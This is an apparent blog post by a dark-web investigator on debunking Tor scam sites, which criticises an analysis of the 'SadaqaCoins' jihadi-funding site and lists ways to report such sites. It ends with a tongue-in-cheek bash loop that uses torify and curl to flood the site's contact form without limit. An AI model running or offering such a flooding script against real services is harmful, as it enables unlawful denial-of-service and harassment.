Everyone familiar with the dark web knows that it’s riddled with scams. Having performed some significant investigations, such as Besa Mafia and The Black Death Group, as well as many smaller ones, I have found that they all have one thing in common — they are desperate to be taken seriously in order for the scam to work.

What you shouldn’t do

Researcher Benjamin Strick recently posted an analysis of an apparent jihadi funding site called ‘SadaqaCoins’:

Via a series of screenshots of the site and some very light Bitcoin analysis (spoilers — no one’s paid!), Strick takes the site content at face value, assuming that it’s jihadis rather than scammers behind the operation. Whilst he demonstrates knowledge of Bitcoin forensics, he lacks experience debunking ubiquitous Tor scams.

As a result, the likely-scam site uses this insufficiently sceptical review to promote itself:

Comments around the review are then retweeted several times by the @Sadaqacoins account.

What you should do

It’s not trivial to deal with Tor scams. Neither journalists nor readers typically care much about the facts of the matter; instead, they are finding their first Tor ‘scoop’ and entertainment, respectively.

Personally, I perform technical and economic analysis of sites, not something everyone can do with a technical or cybercrime background, alas. As a regular person, however, you can:

Get the scammers thrown off their free Tor hosting account if you can identify it.

Get any email addresses terminated via abuse/terms email contacts and use social media:

Report their misuse of social media accounts for breaking their terms of service

Finally, when all else fails, well, it may be a breach of the Computer Misuse Act 1990 to run an automation script against their captcha-less contact form to spam them, so you shouldn’t do that.

count=1

while true

do

torify curl 'http://sadaqabmnor4ufnj.onion/contact/message.php' --data 'message=fake'

echo $count

let count++

done

Definitely don’t do that 30,000 times. Or to /start/start.php